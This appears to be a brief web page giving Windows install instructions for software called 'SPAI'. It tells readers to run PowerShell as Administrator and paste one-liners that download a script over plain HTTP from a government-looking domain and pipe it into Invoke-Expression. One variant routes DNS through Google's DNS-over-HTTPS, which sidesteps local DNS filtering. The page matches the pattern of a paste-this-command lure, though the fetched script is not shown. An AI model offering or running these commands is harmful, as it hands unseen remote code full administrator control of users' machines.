Install SPAI using a single PowerShell command — fast, safe, and reliable.
Follow these simple steps to install SPAI on your Windows system
Right‑click PowerShell and choose "Run as Administrator".
irm http://spai.kdh.moh.gov.my | iex
iex ((New-Object Net.WebClient).DownloadString('http://spai.kdh.moh.gov.my/ps'))
Windows 10/11 updated builds only.
iex (curl.exe -s --doh-url https://8.8.8.8/dns-query http://spai.kdh.moh.gov.my/ps | Out-String)